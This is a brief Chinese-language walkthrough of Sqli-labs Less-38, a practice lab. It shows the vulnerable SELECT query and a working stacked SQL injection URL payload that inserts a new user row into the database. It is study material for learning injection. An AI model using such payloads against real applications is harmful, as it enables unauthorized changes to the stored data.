标签:
学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。
在执行select时的sql语句为:SELECT * FROM users WHERE id=‘$id‘ LIMIT 0,1
可以直接构造如下的payload:
http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27,%27less38%27,%27hello%27)--+
再看数据表中的内容:可以看到less38已经添加。
Sqli-labs less 38
原文地址:http://www.cnblogs.com/lcamry/p/5762877.html